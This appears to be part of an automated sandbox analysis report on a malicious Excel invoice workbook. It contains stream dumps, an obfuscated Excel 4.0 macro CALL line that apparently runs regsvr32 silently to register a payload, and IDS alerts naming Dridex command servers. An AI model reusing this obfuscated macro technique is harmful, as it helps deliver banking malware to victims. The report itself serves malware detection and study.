Base64 Encoded:	True
Data ASCII:	I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 3 - D B B 2 9 D 5 C 1 4 7 9 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 6 A 4 5 5 3 1 5 D 7 1 0 7 7 5 0 7 7 5 0 7 7 5 0 7 7 5 " . . D P B = " 4 C 4 E B F E 7 C 3 8 C C 4 8 C C 4 8 C "
Data Raw:	49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 33 2d 44 42 42 32 39 44 35 43 31 34 37 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d

Stream Path: PROJECTwm, File Type: data, Stream Size: 86

General
Stream Path:	PROJECTwm
File Type:	data
Stream Size:	86
Entropy:	3.24455457963
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00

Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3568

General
Stream Path:	VBA/_VBA_PROJECT
File Type:	data
Stream Size:	3568
Entropy:	4.44836813862
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2060

General
Stream Path:	VBA/__SRP_0
File Type:	data
Stream Size:	2060
Entropy:	3.44747656578
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . F . \| . . . N . . . d 9 . . L . . . . . . . .
Data Raw:	93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00

Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187

General
Stream Path:	VBA/__SRP_1
File Type:	data
Stream Size:	187
Entropy:	1.91493173134
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o . . . . . . . . . . . . . . . . y e l ^ . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 363

General
Stream Path:	VBA/__SRP_2
File Type:	data
Stream Size:	363
Entropy:	2.21122978445
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398

General
Stream Path:	VBA/__SRP_3
File Type:	data
Stream Size:	398
Entropy:	2.07709195049
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: VBA/dir, File Type: data, Stream Size: 820

General
Stream Path:	VBA/dir
File Type:	data
Stream Size:	820
Entropy:	6.50155040494
Base64 Encoded:	True
Data ASCII:	. 0 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:	01 30 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 07 af eb 61 04 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Macro 4.0 Code

CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)

"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

OLE File "/opt/package/joesandbox/database/analysis/338363/sample/INV8222874744_20210111490395.xlsm"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Author:
Last Saved By:
Create Time:	2020-12-07T14:38:21Z
Last Saved Time:	2021-01-11T15:24:48Z
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0300

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 115

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	115
Entropy:	4.80096587863
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: f, File Type: data, Stream Size: 178

General
Stream Path:	f
File Type:	data
Stream Size:	178
Entropy:	2.65549603888
Base64 Encoded:	False
Data ASCII:	. . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 r i . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . .
Data Raw:	00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 00 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 72 69 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110

General
Stream Path:	i02/\x1CompObj
File Type:	data
Stream Size:	110
Entropy:	4.63372611993
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i02/f, File Type: data, Stream Size: 40

General
Stream Path:	i02/f
File Type:	data
Stream Size:	40
Entropy:	1.54176014818
Base64 Encoded:	False
Data ASCII:	. . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i02/o, File Type: empty, Stream Size: 0

General
Stream Path:	i02/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110

General
Stream Path:	i03/\x1CompObj
File Type:	data
Stream Size:	110
Entropy:	4.63372611993
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i03/f, File Type: data, Stream Size: 40

General
Stream Path:	i03/f
File Type:	data
Stream Size:	40
Entropy:	1.90677964945
Base64 Encoded:	False
Data ASCII:	. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i03/o, File Type: empty, Stream Size: 0

General
Stream Path:	i03/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: o, File Type: data, Stream Size: 152

General
Stream Path:	o
File Type:	data
Stream Size:	152
Entropy:	2.92242946564
Base64 Encoded:	False
Data ASCII:	. . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . a @ . . . . P a g e 2 . a @ . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . .
Data Raw:	00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 91 61 40 05 00 00 80 50 61 67 65 32 91 61 40 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80

Stream Path: x, File Type: data, Stream Size: 48

General
Stream Path:	x
File Type:	data
Stream Size:	48
Entropy:	1.42267983198
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00

Macro 4.0 Code

CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)

"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/12/21-07:43:33.658950	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49170	77.220.64.37	192.168.2.22
01/12/21-07:43:36.136204	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49171	80.86.91.27	192.168.2.22
01/12/21-07:43:36.749119	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49172	5.100.228.233	192.168.2.22
01/12/21-07:43:36.749119	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49172	5.100.228.233	192.168.2.22
01/12/21-07:43:37.826247	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49174	77.220.64.37	192.168.2.22
01/12/21-07:43:38.350921	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49175	80.86.91.27	192.168.2.22
01/12/21-07:43:38.863671	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49176	5.100.228.233	192.168.2.22
01/12/21-07:43:38.863671	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49176	5.100.228.233	192.168.2.22
01/12/21-07:43:39.901704	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49178	77.220.64.37	192.168.2.22
01/12/21-07:43:40.429721	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49179	80.86.91.27	192.168.2.22
01/12/21-07:43:40.959769	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49180	5.100.228.233	192.168.2.22
01/12/21-07:43:40.959769	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49180	5.100.228.233	192.168.2.22
01/12/21-07:43:41.993721	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49182	77.220.64.37	192.168.2.22
01/12/21-07:43:42.512755	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49183	80.86.91.27	192.168.2.22
01/12/21-07:43:43.028953	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49184	5.100.228.233	192.168.2.22
01/12/21-07:43:43.028953	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49184	5.100.228.233	192.168.2.22
01/12/21-07:43:44.079883	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49186	77.220.64.37	192.168.2.22
01/12/21-07:43:44.585353	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49187	80.86.91.27	192.168.2.22
01/12/21-07:43:45.102788	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49188	5.100.228.233	192.168.2.22
01/12/21-07:43:45.102788	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49188	5.100.228.233	192.168.2.22
01/12/21-07:43:46.137309	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49190	77.220.64.37	192.168.2.22
01/12/21-07:43:46.647682	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49191	80.86.91.27	192.168.2.22
01/12/21-07:43:47.162018	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49192	5.100.228.233	192.168.2.22
01/12/21-07:43:47.162018	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49192	5.100.228.233	192.168.2.22
01/12/21-07:43:48.184795	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49194	77.220.64.37	192.168.2.22
01/12/21-07:43:48.705314	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49195	80.86.91.27	192.168.2.22
01/12/21-07:43:49.214758	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49196	5.100.228.233	192.168.2.22
01/12/21-07:43:49.214758	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49196	5.100.228.233	192.168.2.22
01/12/21-07:43:50.256207	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49198	77.220.64.37	192.168.2.22
01/12/21-07:43:50.782216	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49199	80.86.91.27	192.168.2.22
01/12/21-07:43:51.345705	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49200	5.100.228.233	192.168.2.22
01/12/21-07:43:51.345705	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49200	5.100.228.233	192.168.2.22
01/12/21-07:43:52.587001	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49202	77.220.64.37	192.168.2.22
01/12/21-07:43:54.171911	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49203	80.86.91.27	192.168.2.22
01/12/21-07:43:54.682510	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49204	5.100.228.233	192.168.2.22
01/12/21-07:43:54.682510	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49204	5.100.228.233	192.168.2.22
01/12/21-07:43:55.827256	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49206	77.220.64.37	192.168.2.22
01/12/21-07:43:56.340702	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49207	80.86.91.27	192.168.2.22
01/12/21-07:43:56.850525	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49208	5.100.228.233	192.168.2.22
01/12/21-07:43:56.850525	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49208	5.100.228.233	192.168.2.22
01/12/21-07:43:57.870601	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49210	77.220.64.37	192.168.2.22
01/12/21-07:43:58.398276	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49211	80.86.91.27	192.168.2.22
01/12/21-07:43:58.899992	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49212	5.100.228.233	192.168.2.22
01/12/21-07:43:58.899992	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49212	5.100.228.233	192.168.2.22
01/12/21-07:43:59.946668	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49214	77.220.64.37	192.168.2.22
01/12/21-07:44:00.463372	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49215	80.86.91.27	192.168.2.22
01/12/21-07:44:00.965157	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49216	5.100.228.233	192.168.2.22
01/12/21-07:44:00.965157	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49216	5.100.228.233	192.168.2.22
01/12/21-07:44:01.972986	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49218	77.220.64.37	192.168.2.22
01/12/21-07:44:02.482752	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49219	80.86.91.27	192.168.2.22
01/12/21-07:44:03.023607	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49220	5.100.228.233	192.168.2.22
01/12/21-07:44:03.023607	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49220	5.100.228.233	192.168.2.22
01/12/21-07:44:04.051670	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49222	77.220.64.37	192.168.2.22
01/12/21-07:44:04.576981	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49223	80.86.91.27	192.168.2.22
01/12/21-07:44:05.086203	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49224	5.100.228.233	192.168.2.22
01/12/21-07:44:05.086203	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49224	5.100.228.233	192.168.2.22
01/12/21-07:44:06.128903	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49226	77.220.64.37	192.168.2.22
01/12/21-07:44:06.640937	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49228	80.86.91.27	192.168.2.22
01/12/21-07:44:07.169169	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49229	5.100.228.233	192.168.2.22
01/12/21-07:44:07.169169	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49229	5.100.228.233	192.168.2.22
01/12/21-07:44:08.250636	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49232	77.220.64.37	192.168.2.22
01/12/21-07:44:08.882881	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49233	80.86.91.27	192.168.2.22
01/12/21-07:44:09.474906	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49234	5.100.228.233	192.168.2.22
01/12/21-07:44:09.474906	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49234	5.100.228.233	192.168.2.22
01/12/21-07:44:11.343771	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49236	77.220.64.37	192.168.2.22
01/12/21-07:44:11.855401	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49237	80.86.91.27	192.168.2.22
01/12/21-07:44:12.362938	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49238	5.100.228.233	192.168.2.22
